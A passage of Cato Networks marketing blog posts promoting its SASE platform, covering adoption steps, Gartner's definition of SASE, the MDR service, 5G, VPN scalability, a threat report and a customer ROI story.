by Gartner for a reason. It changes the way IT delivers the entire networking and security capability to the business and the stakes are high. SASE functional capabilities will continue to grow over time with all vendors. But, without the right underlying architecture, enterprises will fail to realize the transformational power of SASE. Cato is the pioneer of the SASE category. We created the ONLY architecture purposely built to deliver the value that SASE aims to create. Whether it is M&A, global expansion, new work models, emerging threats or business opportunities, with Cato’s true SASE architecture you are ready for whatever comes next.

5 Steps to Prepare for SASE Adoption

Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up. Secure Access Service Edge (SASE) offers security designed for the...
5 Steps to Prepare for SASE Adoption Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up. Secure Access Service Edge (SASE) offers security designed for the modern enterprise, including native support for remote work. SASE combines networking and security functions into a single cloud service. This combination not only improves the security of the network but makes it faster and more scalable as well. In recent years, I’ve seen a surge of interest in SASE as organizations start looking for ways to upgrade their infrastructure to support their remote workforce and achieve their goals of implementing zero trust security. However, adopting SASE means that an organization needs to make major changes in how its network operates and is secured. Below are five steps to help you make your SASE adoption process as smooth and painless as possible. [boxlink link="https://catonetworks.easywebinar.live/registration-86?utm_campaign=blog_CTA_From_VPN_to_ZTNA_to_SASE"] Join our webinar: The Evolution of Remote Access: From VPN to ZTNA to SASE [/boxlink] #1. Know your Users and their Applications When planning your SASE migration, it’s important to keep your users in mind. Every organization has a unique user base, and these users and their needs will determine the required configuration for SASE. If you don’t know how your IT environment is used on a daily basis, it is much harder to secure it. One of the core benefits of SASE is its support for zero trust security, which requires access controls to be defined based upon business needs. Understanding the structure and use cases of your IT environment is essential for ensuring a smooth migration to SASE and building effective test plans to verify services post-cutover. #2. Know your Security Policies and Regulatory Compliance Obligations In recent years, the regulatory landscape has exploded. New laws like the EU’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) add further obligations and security requirements for organizations. When designing your SASE Architecture, it’s important to keep these regulations and corporate security policies in mind. With the recent rise in remote work, it is essential to ensure that your SASE solution is properly set up to support a secure remote workforce. This includes configuring ZTNA/SDP to provide remote access to corporate resources while maintaining compliance with data protection regulations and corporate security policies. #3. Prepare for the Unknown and Unexpected The primary goal of SASE security is to simplify and streamline security by consolidating multiple functions into a single service. This enables security teams to have full visibility into their network architecture. With this increased visibility comes the potential to discover previously unknown security issues within an organization’s IT environment. As you make the migration over to SASE, be prepared to investigate and remediate previously unknown issues, such as security breaches, poorly performing Internet circuits, shadow IT services, and unintentionally permitted traffic flows. #4. Bring in the ‘A-Team’ A migration to SASE is a complete overhaul of an organization’s IT and security infrastructure. SASE replaces legacy security appliances with a cloud-based, fully-integrated solution. When making this transition, it is vital to engage all stakeholders in the process. This includes internal IT, external contractors, channel partners, MSPs, etc. By bringing in all of these parties from the very beginning, an organization ensures a smoother transition to SASE. Stakeholders can identify and plan for use cases and business needs from the beginning rather than discovering them later in the process. #5. Get Ready for Things to Get Better After making the move, your organization will be able to take full advantage of the benefits of SASE. SASE optimizes both networking and security infrastructure, meaning that your environment will not only be more secure but more agile and efficient as well. After migrating to SASE, IT will also be freed of the tedious and time consuming maintenance of disparate point solutions, freeing up their time to focus on core business needs. The Road to SASE Starts Here If you’re just starting out on your SASE journey, I recommend checking out SASE for Dummies book, which provides a solid grounding on SASE and its benefits to the organization. From there, you can pursue a SASE Expert Certification and build the skills that you will need to effectively implement SASE within your organization.    

Gartner’s Nat Smith Explains What Is and Is Not SASE

A good portion of my day is spent speaking with the news media about Cato and the SASE market. There’s a routine to these conversations. Many will groan over an acronym that’s pronounced “sassy.” They’ll listen but often dismiss the area as “just more Gartner hype.”  For many, SASE seems like another marketing exercise like Big Data or Cloud Computing. And I get that. For 20+ years, I too was an IT journalist. As a feature journalist, I was lucky. I...
Gartner’s Nat Smith Explains What Is and Is Not SASE A good portion of my day is spent speaking with the news media about Cato and the SASE market. There’s a routine to these conversations. Many will groan over an acronym that’s pronounced “sassy.” They’ll listen but often dismiss the area as “just more Gartner hype.”  For many, SASE seems like another marketing exercise like Big Data or Cloud Computing. And I get that. For 20+ years, I too was an IT journalist. As a feature journalist, I was lucky. I could specialize and dive deep into the nuances of technologies. News journalists aren’t so fortunate. They must move between many technology areas, making it incredibly difficult to uncover the differences between slideware and reality. So, I understand skepticism around SASE, particularly when every little networking and security vendor claims to be a SASE company. And if every security device, virtual appliance, or managed service is SASE, what have we accomplished? Nothing. Which is why a recent session by Nat Smith, Senior Director in the Technology and Service Provider (TSP) division of Gartner, was so interesting. Smith pierced the confusion around the SASE market, explaining what is and what is not SASE in a very plain spoken kind of way. [boxlink link="https://catonetworks.easywebinar.live/registration-77?utm_source=blog&utm_medium=top_link&utm_campaign=gartner_webinar"] Join Our Webinar –Strategic Roadmap for SASE [/boxlink] SASE connects people and devices to services Smith’s explanation was very straight forward: SASE is taking the networking service and those kinds of capabilities and also the security service and those capabilities and putting them into a single offering. Some people will simplify it a little bit and say SASE is connecting people and devices to services. His simple definition alludes to two innovations. The first is convergence, the bringing of all networking and security functionality together. For too long, enterprises have had to grapple with the complexity of managing and integrating network security appliances. The assortment of appliances dotting enterprise networks extracted a significant operational burden on IT teams. They had to patch and maintain appliances. As encrypted traffic levels grew and CPU demands soared, branch appliances had to be upgraded. Gaps were created for attackers to exploit, required significant investment to integrate solutions. Visibility grew limited as critical data was locked behind silos requiring additional management tools to overcome those issues. Convergence solves these issues, pulling networking and network security functions into one seamless solution. Packets come into the SASE platform, get decrypted, and functions applied in a single pass before sending the packet onto its destination. Performing operations in parallel rather than moving them through a service chain of devices reduces latency and allows the SASE platform to scale more efficiently. While Gartner documents point to a wide range of functions converged by SASE, Smith broke them down into five main areas: SD-WAN, FWaaS, SWG, CASB, and ZTNA. In truth, security and networking convergence preceded SASE. UTMs are probably the best example, and even some SD-WAN appliances have added security capabilities (Figure 1).  Which brings us to the next innovation —cloud-native services. [caption id="attachment_17138" align="alignnone" width="1546"] Figure 1: Network security appliances are “thick,” performing all functions themselves.[/caption] SASE: It’s not an appliance  SASE is a true cloud service. It’s not a single-tenant appliance stuck in the Cloud. It’s a multitenant platform designed as a cloud service. I think of it as the difference between O365 and Word. Microsoft, and all cloud providers, push out new features and new capabilities all the time. There’s no need to download, test, and deploy a new version worrying all the while the repercussions for my laptop. And while desktop software only works for that computer, the Cloud is available to me wherever I go, from whatever device I’m using. I don’t have to worry about running out of storage or patching software. The provider handles all of that. SASE brings those same cloud benefits to networking and security. SASE breaks functionality into two, keeping the bare minimum at the edge while moving core functioning into the Cloud (Figure 2). There are no patches or updates to test and deploy; they just “appear” in the service. Storage and scaling are things the provider has to worry about, not IT. [caption id="attachment_17147" align="alignnone" width="1567"] Figure 2: SASE creates a “light” appliance at the edge, providing just enough processing to move traffic into the Cloud where compute-intensive security and networking services can benefit from the scalability and elasticity of the Cloud.[/caption] Shifting processing to the Cloud leverages the Cloud’s scalability and elasticity. Compute-intensive services, like content inspection, normally force branch appliance upgrades to accommodate traffic growth. But within the Cloud, they can run at line-rate regardless of traffic volumes. And by being in the Cloud, SASE services can be made available to users anywhere without a perceptible difference.   SASE: It’s not just in the Cloud; it is the Cloud  And this point, SASE services being made available to the user efficiently; that’s critical. Smith pointed to the below example where security processing happens in Shanghai PoP that services three locations — Shanghai, Singapore, and San Francisco (Figure 3). He posed the question, “Is this SASE or not?” [caption id="attachment_17152" align="alignnone" width="1577"] Figure 3: SASE is not a single PoP converging networking and security services, as users located far away (in San Francisco, in this case) will not experience local performance.[/caption] Shanghai users will experience pretty good response time. Singapore less so, but San Francisco? With a thousand kilometers to the Shanghai PoP, San Francisco users will experience significant latency as traffic is brought back to Shanghai for inspection. Users probably won’t call it that. They’ll likely talk about “the network being slow” or applications taking forever to load.” But the culprit will remain the same: the latency needed to get back to PoP for processing. A single PoP does not make SASE. SASE is meant to give local performance to all users regardless of location. As such, Smith points out that SASE must be distributed, delivering a cloud edge service that brings security processing near the source. A global network of PoPs is needed, where PoPs are close to the company locations and mobile users using that service (see Figure 4). [caption id="attachment_17155" align="alignnone" width="1571"] Figure 4: With SASE, security processing is distributed across a global fabric of PoPs. Users experience local performance regardless of location.[/caption] Convergence and Cloud-Native Define SASE  SASE is the convergence of networking and security, but it’s also about moving from the edge to the Cloud. Smith sees both of those elements — convergence and cloud-native — as essential for realizing SASE’s promise. Failure to deliver on both of those elements isn’t SASE. It’s just hype.      

Update to Cato MDR Shortens Time-to-Value, Automates 70 Security Checks

Nobody likes to wait for results, and that’s certainly the case when it comes to managed detection and response (MDR) services. MDR services are meant to eliminate threats faster by outsourcing threat hunting to third-party specialists. But to accomplish their goal, MDR services require up to 90 days to baseline typical network operation. Which is...
Update to Cato MDR Shortens Time-to-Value, Automates 70 Security Checks Nobody likes to wait for results, and that's certainly the case when it comes to managed detection and response (MDR) services. MDR services are meant to eliminate threats faster by outsourcing threat hunting to third-party specialists. But to accomplish their goal, MDR services require up to 90 days to baseline typical network operation. Which is odd if you think about it. Malware dwell time already exceeds 200 days. Why invest in an MDR service if it'll be another three months before your organization realizes any results? Cato has a better way. The new release of Cato MDR announced this week eliminates the startup window by tapping cross-organizational baselines developed using the Cato system. Let's take a closer look. What's Behind the Cato MDR Service  As part of the broader Cato service, Cato MDR has deep visibility into enterprise traffic patterns. We've developed a simply massive data warehouse storing the metadata for every IP address, session, and flow crossing the Cato global backbone. We do that over time, so we can see the historical and current traffic patterns across thousands of enterprises and hundreds of thousands of remote users worldwide. [boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt?utm_source=blog&utm_medium=upper_cta&utm_campaign=5_things_ebook"] Download eBook – 5 things SASE covers that SD-WAN doesn't [/boxlink] This incredible data repository gives us the basis for our Cato Threat Hunting System (CTHS), a set of multidimensional machine learning algorithms and procedures developed by Cato Research Labs that continuously analyze customer traffic for the network attributes indicative of threats. More specifically,  CTHS has the following capabilities: Full Visibility, No Sensors: Cato sees all WAN and Internet traffic normally segmented by network firewalls and Network Address Translation (NAT). CTHS has full access to real-time network traffic for every IP, session, and flow initiated from any endpoint to any WAN or Internet resource. Optional SSL decryption further expands available data for threat mining. CTHS uses its deep visibility to determine the client application communicating on the network and identify unknown clients. The raw data needed for this analysis is often unavailable to security analytics platforms, such as SIEMs, and is impossible to correlate for real-time systems, such as legacy IPS. Deep Threat Mining: Data aggregation and machine learning algorithms mine the full network context over time and across multiple enterprise networks. Threat mining identifies suspicious applications and domains using a unique "popularity" indicator modeled on access patterns observed throughout the customer base. Combining client and target contexts yields a minimal number of suspicious events for investigation. Human Threat Verification: Cato's world-class Security Operations Center (SOC) validates the events generated by CTHS to ensure customers receive accurate notifications of live threats and affected devices. CTHS output is also used to harden Cato's prevention layers to detect and stop malicious activities on the network. Rapid Threat Containment: For any endpoint, specific enterprise network, or the entire Cato customers base, the SOC can deploy policies to contain any exposed endpoint, both fixed and mobile, in a matter of minutes. CTHS creates a deep, threat-hunting foundation that powers all Cato security services without requiring customers to deploy data collection infrastructure or analyze mountains of raw data. At the same time, CTHS adheres to privacy regulatory frameworks such as GDPR. With CTHS and Cato Cloud, enterprises of all sizes continue their journey to streamline and simplify network and security. Cato MDR 2.0 Gains Automated 70-Point Checklist Beyond faster time-to-value, Cato has also introduced automatic security assessment to the MDR service. Instantly, customers learn how their network security compares against the checks and best practices implemented by enterprises worldwide. Items inspected include proper network segmentation, firewall rules, and security controls, like IPS and anti-malware. The 70-point checklist is derived from the practices of the "best" enterprises across Cato — and avoids the biggest mistakes of the worst enterprises. "Much of what we're highlighting in our 70-point checklist is probably common sense to any security-minded professional. But all too often, those practices have not been found in one actionable resource," says Elad Menahem, director of security at Cato Networks. And to further enhance the support given to Cato MDR customers, we've designated security engineers for each customer. The DSEC becomes the customer's single point of contact and security advisor. The DSEC can also tweak threat hunting queries to enhance detection specific to the customer environment, such as gathering specific network information to protect specific valuable assets. The DSEC is part of the large SOC team, sitting between the Security Analysts and the Security Research. Coupled with CTHS and Cato's unique data warehouse, Cato MDR brings the best of human intelligence and machine intelligence for the highest degree of protection. Overall, Cato underscores yet another aspect of the value of a global, cloud-native SASE platform. To learn more about Cato MDR, visit https://www.catonetworks.com/services#managed-threat-detection-and-response. [caption id="attachment_16724" align="alignleft" width="654"] The Cato automatic assessment identifies misconfiguration against 70 security best practices, returning a security posture score and a detailed report for easy action.[/caption]    

5G: A Step Beyond the Last Mile?

During the third and fourth quarters of 2019, Amazon spent a total of $3B on its one-day delivery program. At issue for the retail giant was solving the last mile, a challenge that has vexed organizations for decades. The telecom industry, which coined the last mile phrase decades ago, claims to be on the verge...
5G: A Step Beyond the Last Mile? During the third and fourth quarters of 2019, Amazon spent a total of $3B on its one-day delivery program. At issue for the retail giant was solving the last mile, a challenge that has vexed organizations for decades. The telecom industry, which coined the last mile phrase decades ago, claims to be on the verge of solving the last mile for its customers, with the promise of 5G. Having spent years waiting for fiber rollouts to make it to their office building, news of multigigabit connectivity without wiring is welcome indeed. As exciting as this news is for CIOs, though, the question they should be asking is whether their legacy enterprise networks can take advantage of 5G’s goodness. And the answer to that question is far from certain. Powerful Benefits for Enterprises  A fully operational 5G is a gamechanger for enterprises. The delays and limited data transfer capacity that plague today’s connectivity will quickly become a thing of the past. Businesses will be inoculated against outages, and experience full, continuous high-speed availability. If promises can be believed, enterprises will no longer have to wait months for fiber installations or be limited due to line availability. Rural offices, construction sites, and even offshore oil rigs won’t be limited by a carrier’s unwillingness to invest in high-cost infrastructure expenses that only serve a small number of businesses and fails to deliver a high ROI. [boxlink link="https://www.catonetworks.com/resources/cato-sase-cloud-the-future-sase-today-and-tomorrow/?utm_source=blog&utm_medium=top_cta&utm_campaign=Cato_SASE_Cloud"] Download eBook: The Future SASE – Today and Tomorrow [/boxlink] In addition to easier provisioning, data rates on 5G are lightning-fast. Designed to deliver peak data rates of up to 20Gbps, it is 20 times faster than 4G. For enterprises involved with the Internet of Things (IoT), 5G will be able to provide more than 100Mbps average data transmission to over a million IoT devices within a square kilometer radius. Behaving like the Infinite Middle  The high speeds and elimination of last-mile slowdowns are what enterprises need today. 5G will address surges in capacity driven by the growing demand for video conferencing, increased data storage, and businesses operating from multiple locations. Removing last-mile bottlenecks means there is no need to step down capacity as data approaches the end user. Multi-gig connections can carry high-speed data across the globe and down to the end-user at great speed and lower latency than current solutions. This combination opens the door to greater innovation in many areas. Automation will grow in manufacturing plants through the use of IoT-enabled connected devices. Supply chains will able to share data more efficiently, enabling smoother operation. And expect to see improvements in logistics and deliveries as commercial vehicles take advantage of smart traffic efficiencies created by 5G. Improved traffic flow, decreased journey times, and car-to-car communication will improve the business’s bottom line. Virtual reality (VR) and augmented reality (AR) become possible, opening new opportunities, particularly for retailers. Personalized digital signage, real-time messaging, and promotions based on real-time consumer behavior become possible with 5G. Innovative tools like smart mirrors could advise consumers on fashion choices or recommend cuts of clothes based on their unique body size and shape. AI systems will also use the increased real-time data to get even better at analyzing situations and making recommendations. They’ll be more effective, leading to increased adoption of AI technology. 5G and the elimination of last-mile slowdowns are expected to open the door to anything enterprise IT can imagine. It sounds all too perfect — and it is. The Challenge of Eliminating Last-Mile Slowdowns There’s no doubt that 5G has the potential to transform business. However, transformation comes with security risks that enterprises can’t afford to ignore. A growing number of entry points, a greater reliance on online data streams, and visibility issues increase an enterprises’ exposure to cyberattacks. Early 5G adopters will also be exposed to security risks stemming from misconfigurations and security integrations between 5G and 4G networks. Deploying patchwork security solutions that weren’t designed for 5G networks will not only be ineffective as a security tool, but they may create more problems for IT teams by creating more exploitable network entry points. And enterprises that don’t update their network architectures may find they’re unable to fully benefit from 5G’s performance. That’s because legacy networks backhaul traffic to a central security gateway for inspection and policy enforcement. The latency of that connection, not the last-mile performance, has always been the determinant factor in long-distance connections. Defending Networks with SASE  A secure access service edge (SASE) addresses enterprise needs for a more secure, better performing 5G network. SASE distribution security inspection and policy enforcement out to points of presence (PoPs) across the globe. By connecting to the local PoP, all users — whether in the office, on the road, or at home — are protected against network-based threats. And by avoiding traffic backhaul, SASE allows enterprises to take full advantage of 5G’s faster connections without compromising security. Partners can also easily be connected to a company’s SASE network, allowing for secure, high-performance supply chains. 5G is a transformative access technology. SASE is a transformative architectural approach. Together they allow IT to transform the way enterprises operate. To learn more about 5G and how the Cato SASE platform can help your enterprise, contact us here.    

Poor VPN Scalability Hurts Productivity and Security

Due to the surge in remote work inspired by COVID-19, VPN infrastructure designed to support 10-20% of the workforce has failed to keep up. This has inspired companies to invest in scaling their VPN infrastructure, but this is not as easy as it sounds. VPNs are difficult to scale for a few different reasons, and...
Poor VPN Scalability Hurts Productivity and Security Due to the surge in remote work inspired by COVID-19, VPN infrastructure designed to support 10-20% of the workforce has failed to keep up. This has inspired companies to invest in scaling their VPN infrastructure, but this is not as easy as it sounds. VPNs are difficult to scale for a few different reasons, and this forces companies to make tradeoffs between network performance and security. With growing support for remote work, having an unscalable and unsustainable secure remote access solution is not an option.  So how can organizations scalably and securely support their remote workforces?  We’ll answer that here. Why VPNs scale poorly VPNs are designed to provide privacy, not security. They lack built-in access controls and the ability to inspect traffic for malicious content. As a result, companies commonly use VPNs to backhaul remote workers’ traffic through the corporate LAN for security inspection before sending it on to its destination. This design means that the organization’s VPN solutions, corporate network infrastructure, and perimeter-based security stack are all potential bottlenecks for a VPN-based secure remote access solution. As a result, effectively scaling VPN infrastructure requires investment in a number of areas, including: VPN Infrastructure: As VPN utilization increases, a company’s VPN terminus needs to be able to support more parallel connections. Accomplishing this often requires deploying additional VPN infrastructure to meet current demands. Last Mile Network Links: Network links on the corporate LAN must be capable of supporting the load caused by backhauling all network traffic for security inspection. For all traffic with destinations outside of the corporate LAN, traffic will traverse the network twice - both entering and leaving after security inspection - and network links must have the bandwidth to support this. Security Systems: The use of VPN infrastructure to backhaul business traffic is designed to allow it to undergo security inspection and policy enforcement. Perimeter-based security solutions must have the capacity to process all traffic at line speeds. System Redundancy: With a remote workforce, secure remote access solutions become “critical infrastructure” with high availability requirements. All systems (VPN, networking, security, etc.) must be designed with adequate redundancy and resiliency. Acquiring, deploying, and maintaining adequate infrastructure to meet companies’ remote access needs is expensive. The limited feature set and poor scalability of VPNs contribute to a number of problems that are holding businesses back. An unsustainable and insecure approach The disadvantages of VPNs for businesses contribute to a number of factors that impair the usability and security of these systems, such as: Degraded Performance: Because VPNs have no built-in security functionality, sending traffic through a standalone security stack is essential. This means that many organizations backhaul traffic through corporate LANs for inspection, which creates significant network latency. Appliance Sprawl: The poor scalability and high availability requirements of VPN infrastructure means that organizations need to deploy multiple appliances to meet the needs of a remote workforce. This is expensive and adds complexity to the process of deploying, configuring, and maintaining these appliances. Security Workarounds: The poor scalability of VPNs drives many organizations to make tradeoffs between network performance and security. A common example is backhauling traffic to the corporate network for security inspection, which incurs significant latency. Network-Level Access: VPNs provide authorized users with unlimited access to the corporate network. This enables legitimate users to misuse their access and dramatically increases the risks associated with a compromised user account. The use of enterprise VPN solutions is an unsustainable and insecure approach to implementing secure remote access. As companies plan extended or permanent support for remote work, a better solution is needed. SASE is a scalable alternative for secure remote access With the growth of remote work and cloud computing, companies need a secure remote access solution that is designed for the modern enterprise network. While VPNs cannot effectively scale to meet demand, the same is not true of secure access service edge (SASE). Many of VPNs’ issues arise from two main factors: location and security. VPNs are designed to provide a secure connection to a single terminus, and they lack built-in security so that location needs to host a standalone security stack. SASE eliminates both of these considerations. Instead of a single VPN terminus, SASE is implemented as  a worldwide network of points of presence (PoPs). With so many PoPs, business traffic can enter and leave the corporate WAN at convenient locations. SASE also incorporates a full security stack, enabling any SASE PoP to perform security inspection and policy enforcement for the traffic passing through it. This eliminates the need to deploy standalone security stacks at each terminus or backhaul to a central location for inspection, simplifying security and eliminating unnecessary latency. This security stack includes zero trust network access (ZTNA) - also known as software-defined perimeter (SDP) - for secure remote access. Unlike VPNs, ZTNA/SDP implements zero trust security principles, providing access to resources on a case-by-case basis. This minimizes the risk posed by a compromised user account or malicious user. These two features make SASE a much more scalable secure remote access solution than VPNs. The decentralized nature of the SASE network means that no one location needs to carry the full load of the remote workforce’s network traffic. The network also has built-in redundancy and the ability to easily scale or expand simply by deploying a new virtualized appliance at the desired location. Cato offers secure, scalable remote access for the distributed enterprise Modern businesses need secure remote access solutions that protect their remote workforces without compromising security.  Cato Cloud makes it easy for employees to connect securely from anywhere to anywhere. To learn more about how to deploy high-performance secure remote access, download our free Work from Anywhere for Everyone eBook. If you have questions about the benefits of SASE over VPNs or how Cato Cloud can work with your environment, feel free to contact us. Also, don’t hesitate to request a free demo to see Cato Cloud’s secure remote access capabilities for yourself.    

New Cato Networks SASE Report Identifies Age-Old Threats Lurking on Enterprise Networks

The recent attack on the Colonial Pipeline. Russian and Chinese election meddling. The exotic and spectacular threats grab popular headlines, but it’s the everyday challenges that plague enterprise networks. Unpatched legacy systems, software long exploited by attackers, banned consumer applications, and more leave enterprises exposed to attack.   SASE Platform Gathers Networking and Security Information  Those were just some of the key findings emerging from our analysis of 850 enterprise networks in the Cato Networks SASE Threat Research Report. From January...
New Cato Networks SASE Report Identifies Age-Old Threats Lurking on Enterprise Networks The recent attack on the Colonial Pipeline. Russian and Chinese election meddling. The exotic and spectacular threats grab popular headlines, but it’s the everyday challenges that plague enterprise networks. Unpatched legacy systems, software long exploited by attackers, banned consumer applications, and more leave enterprises exposed to attack.   SASE Platform Gathers Networking and Security Information  Those were just some of the key findings emerging from our analysis of 850 enterprise networks in the Cato Networks SASE Threat Research Report. From January 1 till March 31, Cato used our global SASE platform to gather and analyze network flows from hundreds of enterprises worldwide.  We captured the metadata of every traffic flow from every customer site, mobile user, and cloud resource connected to the Cato global private backbone was in a massive data warehouse.  All totaled more than 200 billion network flows and 100 Terabytes of data per day were stored in the data warehouse.   With this massive repository, we gathered insights into which applications and security threats operate on enterprise networks. Network information was derived using Cato’s own internal tools. Data modeling was used to identify applications by unique traffic identifiers and then looked up in the Cato library of application signatures. Security information was derived by feeding network flow data into the Cato Threat Hunting System (CTHS), a proprietary machine learning platform that identifies threats through contextual network and security analysis. This highly efficient, automated platform eliminated more than 99% of the flows, leaving the Cato security team to analyze 181,000 high-risk flows. The result was 19,000 verified threats.   Key Findings Highlight Risks and Key Applications  Combining network flow data and accurate threat information provides a unique perspective into today’s enterprise networks. Read the report and learn:   The most popular corporate applications on enterprise networks.  Some applications, like Microsoft Office and Google, you will already know, but other applications that have been a source of significant vulnerabilities also lurk on many networks.  Is video-sharing consuming your network bandwidth? A popular video-sharing platform was surprisingly common on enterprise networks, generating even more flows than Google Mail and LinkedIn.   The most common exploits. The report identifies the most common Common Vulnerability and Exposures (CVEs); many were still found in essential enterprise software packages.   The source of most threats. While the news focuses on Russia and China, most threats originate closer to home. “Blocking network traffic to and from ‘the usual suspects may not necessarily make your organization more secure,” says Etay Maor, our senior director of security strategy.  To learn more, check out the Cato Networks SASE Threat Research Report.    

Why a Backbone Is More Than Just a Bunch of PoPs

Since SASE’s introduction, many networking and security vendors have rushed to capitalize on the market by partnering with other providers to include cloud backbones as part of their SASE offerings. But SASE isn’t just a bunch of features in appliances managed from the cloud. It’s about building a true cloud service, one that delivers optimal,...
Why a Backbone Is More Than Just a Bunch of PoPs Since SASE’s introduction, many networking and security vendors have rushed to capitalize on the market by partnering with other providers to include cloud backbones as part of their SASE offerings. But SASE isn’t just a bunch of features in appliances managed from the cloud. It’s about building a true cloud service, one that delivers optimal, secure access to your sites, mobile users, and cloud resources regardless of their location. Achieving that lofty goal requires far more than simply partnering with a global backbone provider. Here’s why. Simple PoPs Have Shortcomings  Every vendor claiming a SASE solution communicates about having a worldwide deployment of Points of Presence (PoPs). But you must consider the architecture of this network. Most vendors claiming a SASE solution host their PoPs in a center provided by Amazon (AWS), Google (GCP), or Microsoft (Azure). The PoP is just a connection point – a gateway, of sorts – where the external world (i.e., your sites) connect to the hosting provider. It is not where data is managed or secured. Those functions take place in a separate compute location/datacenter. Thus, when your traffic reaches a PoP, the PoP sends the traffic into the backbone of the provider to the separate compute location. There is latency in this additional traffic flow. What’s more, while a SASE vendor may claim to have 100+ PoPs, it may only have 20 or 25 compute locations in the world, creating a funnel effect with traffic. This architecture is inherently inefficient and adds latency to all traffic flows. Of course, that compute location isn’t the final destination for your traffic. It would typically be bound for a SaaS application – perhaps one that isn’t hosted in the same region – or to your own datacenter or another branch office (i.e., site to site traffic), or to the general Internet. Now you must consider, how do we keep a reliable network between these points? How do we manage the inbound quality of service? How do we ensure good performance? Are we able to prioritize our key applications, use cases and workloads into our network? SD-WAN will not do these things for you. The fact is, many SASE providers use the Internet as the backbone network between their PoPs. Putting traffic on this backbone uses the best default path. There is no predictability or SLA about performance. There is little or no control over the packets that are traveling on that Internet backbone. If you can’t control the performance of this traffic, you lose control over applications and thus over the user experience. “Best Effort” Isn’t Always the Best Way I have talked with numerous enterprises that replaced MPLS circuits with SD-WAN. Initially, users and management are often happy. IT reduced circuit costs and gained some application steering capabilities at the local level. By that I mean, traffic goes to the SASE solution provider’s PoPs to be forwarded to SaaS or IaaS applications or the Internet. Things work fine—until they don’t. But when performance problems arise, the customers don’t know who to call because the WAN is using the “best effort” Internet to move traffic. It is not under the SASE provider’s control, so there are no guarantees for performance or quality of service. The network works fine 70% or 80% of the time, but the rest of the time there is packet loss, jitter, and high latency. There’s no way to know where the issue is, or how to resolve it. As a result, critical applications like voice can really suffer in this model. Cato’s PoPs Are on a Global Private Backbone  Cato also has a global network of PoPs – more than 60 at this writing – but this network has a different, far more efficient architecture. Cato’s PoPs have multitenant software running in our own datacenters, not in a Google, Microsoft or Amazon cloud. Cato PoPs manage the network and security functions in those very same datacenters. So unlike hosted SASE solutions, Cato doesn’t have to send your traffic to a separate compute location to manage and secure data, which eliminates latency. Moreover, there is a 1:1 ratio of PoPs to compute locations because they are one and the same datacenter. This is important because Gartner says the density and scope of coverage is going to be critical to the success of SASE. Now let’s talk about the network backbone connecting the PoPs. Instead of using the general Internet to connect them, Cato has a global private backbone. It consists of the global, geographically distributed, SLA-backed PoPs interconnected by multiple tier-1 carriers. The IP transit services on these carriers are backed by “five 9s” availability and minimal packet loss guarantees. As such, the Cato Cloud network has predictable and consistent latency and packet loss metrics, unlike the public Internet. Cato’s cloud-native software provides global routing optimization, self-healing capabilities, WAN optimization for maximum end-to-end throughput, and full encryption for all traffic traversing the network. Cato’s global PoPs are connected in a full-mesh topology to provide optimal global routing. The Cato software calculates multiple routes for each packet to identify the shortest path across the mesh. Direct routing to the destination is often the right choice, but in some cases traversing an intermediary PoP (or two) is the better route. Cato Uses Multiple Cloud Optimization Techniques  Cato natively supports cloud datacenters (IaaS) and cloud applications (SaaS) resources without additional configuration, complexity, or point solutions. Specific optimizations include: Shared Internet Exchange Points (IXPs), where the Cato PoPs collocate in data centers directly connected to the IXP of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. Optimized Cloud Provider (IaaS) Access, in which Cato places PoPs on the AWS and Azure infrastructure.  Optimized Public Cloud Application (SaaS) Access, whereby SaaS traffic sent to the Cato Cloud will route over the Cato backbone, exiting at the PoP nearest to the SaaS application.  Cato Has Strong Security at the PoPs  Another differentiator for Cato is the full stack of security solutions embedded in every PoP. Security is conveniently applied to all traffic at the PoP before going to its final destination—whether it’s to another branch, to a SaaS application, to a cloud platform, or to the Internet. The enterprise-grade security includes an application-aware next-generation firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAV), and a managed IPS-as-a-Service (IPS). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints. Zero Trust Network Access (ZTNA) is also part of the integrated security offering. Cato’s PoPs Deliver Extra Value  At Cato, we have a lot of engagements with enterprise organizations that deployed SD–WAN + SWG with PoPs. Most are not satisfied with the results. They are complaining about the lack of full visibility, lack of full control on WAN and Internet traffic, and lack of unification. Part of my job as a sales engineering manager is to reassure them that the solution they really want has existed for five years now and is deployed on thousands of customers. Talk to us about how Cato’s series of PoPs offers quite a lot of value beyond simply connecting edge locations into the WAN.  

One Customer’s ROI Argument for Cato Cloud

When Gartner published its seminal report on SASE (“The Future of Network Security Is in the Cloud, August 2019), the analyst firm listed the reduction of complexity and costs as one of the top benefits of SASE. Each day, Cato customers confirm that‘s the case; there is significant ROI with the simplicity of SASE. Costs...
One Customer’s ROI Argument for Cato Cloud When Gartner published its seminal report on SASE (“The Future of Network Security Is in the Cloud, August 2019), the analyst firm listed the reduction of complexity and costs as one of the top benefits of SASE. Each day, Cato customers confirm that‘s the case; there is significant ROI with the simplicity of SASE. Costs can be vastly reduced when networking and security are merged, and the operational aspects are provided as a service. The company has reduced operational costs by 60 to 70 percent and networking and security costs by 50 percent Recently, one of our customers shared an accounting of their ROI. The company, which asked to be kept is anonymous, is a public company in the construction industry with locations worldwide. Deployment of the Cato is well underway, and already, the company has reduced operational costs by 60 to 70 percent and networking and security costs by 50 percent. Different Types Networks for Different Types of Locations This company is the third–largest construction firm in the world. It has 40 sites in more than 20 countries across Europe, the Americas, and Asia-Pacific. There are more than 3,000 employees worldwide. The company‘s original WAN operated on a telco bundle from a carrier that provided a global MPLS network and worldwide Internet services to the various sites. Secure Web Gateway (SWG) services in the cloud were used to secure the web traffic. The company provided locations with different levels of connectivity based on the criticality of work performed at each site: Level 1 sites required two MPLS and two Internet links.   Level 2 sites required one MPLS and one Internet link.  Level 3 sites required just one Internet link.  Level 4 sites required a basic Internet link.  For example, the company’s main datacenter received Level 1 treatment, as did some of the high-profile manufacturing centers, to ensure continuous connectivity. By contrast, the smallest of offices were level 4. There Were Many Drivers for a New Network  The existing network was very complex to manage, did not provide agility, was expensive to operate, and had considerable security gaps that put the business at 